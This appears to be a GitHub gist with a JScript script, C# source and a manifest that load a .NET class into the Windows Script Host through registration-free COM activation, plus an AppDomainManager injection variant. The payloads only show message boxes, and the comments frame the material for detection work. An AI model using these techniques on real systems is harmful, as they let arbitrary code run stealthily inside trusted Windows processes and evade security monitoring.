
@NotMedic
Created March 31, 2020 16:56
Basic / MyDLL
// basic.js (Windows Script Host, JScript).
// Creates the COM-visible .NET class MyDLL.Operations without a registry entry:
// the class is described by a manifest handed to Microsoft.Windows.ActCtx as text,
// and the object is then created through that activation context.
//
// Observable behaviour for detection: a script host process sets COMPLUS_Version
// (and, in the disabled variant, APPDOMAIN_MANAGER_ASM / APPDOMAIN_MANAGER_TYPE) in
// its own environment and then instantiates a clrClass, i.e. a managed class ends up
// hosted inside the script process.

// Process-scoped environment block; changes apply to this process only.
var procEnv = new ActiveXObject('WScript.Shell').Environment('Process');

// NOTE(review): TMP is redirected to a directory under System32. The page does not
// say why; presumably the activation context resolves the manifest's <file> entry
// relative to it. Confirm before relying on this.
procEnv('TMP') = 'C:\\Windows\\System32\\Tasks';

// AppDomainManager variant, disabled in this copy (the enabled form appears in the
// trailing comment of mydll.cs):
//procEnv('APPDOMAIN_MANAGER_ASM') = "mydll, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null"
//procEnv('APPDOMAIN_MANAGER_TYPE') = "MyAppDomainManager";

// CLR version for this process; same value as runtimeVersion in the manifest.
procEnv('COMPLUS_Version') = 'v4.0.30319';

// Inline manifest: maps the ProgID/CLSID to the managed class. This copy names the
// assembly "tasks" / tasks.dll, whereas the csc command in mydll.cs emits mydll.dll.
var manifestXml = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?><assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3"> <dependency><dependentAssembly> <assemblyIdentity name="tasks" version="0.0.0.0"/> </dependentAssembly> </dependency> <assemblyIdentity name="tasks" type="win32" version="0.0.0.0" /><description>Built with love by Casey Smith @subTee </description><clrClass name="MyDLL.Operations" clsid="{31D2B969-7608-426E-9D8E-A09FC9A5ACDC}" progid="MyDLL.Operations" runtimeVersion="v4.0.30319" threadingModel="Both" /><file name="tasks.dll"> </file></assembly>';

var actCtx = new ActiveXObject("Microsoft.Windows.ActCtx");
actCtx.ManifestText = manifestXml;

// Late-bound instance of the managed class, resolved by ProgID through the manifest.
var ops = actCtx.CreateObject("MyDLL.Operations");

var stdout = WScript.StdOut;
stdout.WriteLine(ops.getValue1("a"));
stdout.WriteLine(ops.getValue2());
ops.getValue3(); // shows the message box from the assembly
```
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
using System.IO;
using System.Reflection;
using System.Runtime.Hosting;
//C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:mydll.dll mydll.cs
/// <summary>
/// Demonstration <see cref="AppDomainManager"/> whose only action is to show a
/// message box when a new application domain is initialized.
/// </summary>
/// <remarks>
/// The trailing comment in this file selects this type through the
/// APPDOMAIN_MANAGER_ASM and APPDOMAIN_MANAGER_TYPE environment variables. Those
/// variables, and the equivalent appDomainManagerAssembly / appDomainManagerType
/// configuration elements, are the settings to monitor for this behaviour.
/// </remarks>
public sealed class MyAppDomainManager : AppDomainManager
{
    /// <summary>
    /// Override of the domain-initialization hook; displays a fixed message box.
    /// </summary>
    /// <param name="appDomainInfo">Setup data for the new domain; not read here.</param>
    public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
    {
        // Author's note: a domain manager can do more than is shown here, for
        // example take part in assembly binding.
        const string Banner = "AppDomain - KaBoomBeacon!";
        System.Windows.Forms.MessageBox.Show(Banner);
    }
}
namespace MyDLL
{
    /// <summary>
    /// COM-visible sample class. The CLSID and ProgID declared here are the same
    /// values the script-side manifest lists in its clrClass element.
    /// </summary>
    /// <remarks>
    /// <see cref="ClassInterfaceType.None"/> is used and no interface is implemented,
    /// so the script calls the members by name (late binding). The member names are
    /// therefore part of the contract with basic.js and keep their original casing.
    /// </remarks>
    [ComVisible(true)]
    [Guid("31D2B969-7608-426E-9D8E-A09FC9A5ACDC")]
    [ClassInterface(ClassInterfaceType.None)]
    [ProgId("MyDLL.Operations")]
    public class Operations
    {
        /// <summary>
        /// Writes a fixed line to the console whenever an instance is created.
        /// </summary>
        public Operations()
        {
            Console.WriteLine("So It Begins");
        }

        /// <summary>
        /// Maps a one-letter selector to a fixed message.
        /// </summary>
        /// <param name="sParameter">Selector; "a", "b" and "c" are recognised.</param>
        /// <returns>
        /// The message for the selector, or "Other" for any other value (including null).
        /// </returns>
        [ComVisible(true)]
        public string getValue1(string sParameter)
        {
            if (sParameter == "a")
            {
                return "A was chosen";
            }

            if (sParameter == "b")
            {
                return "B was chosen";
            }

            if (sParameter == "c")
            {
                return "C was chosen";
            }

            return "Other";
        }

        /// <summary>
        /// Returns a constant string.
        /// </summary>
        /// <returns>The literal "From VBS String Function".</returns>
        [ComVisible(true)]
        public string getValue2()
        {
            const string Reply = "From VBS String Function";
            return Reply;
        }

        /// <summary>
        /// Shows a message box with a fixed text; returns nothing to the caller.
        /// </summary>
        [ComVisible(true)]
        public void getValue3()
        {
            const string Text = "Hey From My Assembly";
            System.Windows.Forms.MessageBox.Show(Text);
        }
    }
}
/*
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:mydll.dll mydll.cs
basic.js
1. make C:\Things
2. copy cscript.exe C:\Things
3. cscript.exe basic.js
new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Things';
new ActiveXObject('WScript.Shell').Environment('Process')('APPDOMAIN_MANAGER_ASM') = "mydll, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null"
new ActiveXObject('WScript.Shell').Environment('Process')('APPDOMAIN_MANAGER_TYPE') = "MyAppDomainManager";
new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319';
var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?><assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3"> <assemblyIdentity name="mydll" type="win32" version="0.0.0.0" /><description>Built with love by Casey Smith @subTee </description><clrClass name="MyDLL.Operations" clsid="{31D2B969-7608-426E-9D8E-A09FC9A5ACDC}" progid="MyDLL.Operations" runtimeVersion="v4.0.30319" threadingModel="Both" /><file name="mydll.dll"> </file></assembly>';
var ax = new ActiveXObject("Microsoft.Windows.ActCtx");
ax.ManifestText = manifest;
var dwx = ax.CreateObject("MyDLL.Operations");
WScript.StdOut.WriteLine(dwx.getValue1("a"));
WScript.StdOut.WriteLine(dwx.getValue2());
dwx.getValue3() //Trigger Message Box
*/
```
<?xml version="1.0" encoding="utf-8"?>
<!-- Application manifest for the "mydll" assembly. It carries only the assembly
identity and an empty compatibility section; the clrClass and file entries used for
COM activation appear in the manifests embedded in the scripts, not in this file. -->
<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
<!-- Identity: name and version match the "mydll, Version=0.0.0.0" string used for
APPDOMAIN_MANAGER_ASM in the trailing comment of mydll.cs. -->
<assemblyIdentity version="0.0.0.0" name="mydll"/>
<!-- No supported-OS entries are declared; the application element is empty. -->
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
</application>
</compatibility>
<!-- Indicates that the application is DPI-aware and will not be automatically scaled by Windows at higher
DPIs. Windows Presentation Foundation (WPF) applications are automatically DPI-aware and do not need
to opt in. Windows Forms applications targeting .NET Framework 4.6 that opt into this setting, should
also set the 'EnableWindowsFormsHighDpiAutoResizing' setting to 'true' in their app.config. -->
<!--
<application xmlns="urn:schemas-microsoft-com:asm.v3">
<windowsSettings>
<dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
</application>
-->
<!-- Enable themes for Windows common controls and dialogs (Windows XP and later) -->
<!--
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="*"
publicKeyToken="6595b64144ccf1df"
language="*"
/>
</dependentAssembly>
</dependency>
-->
</assembly>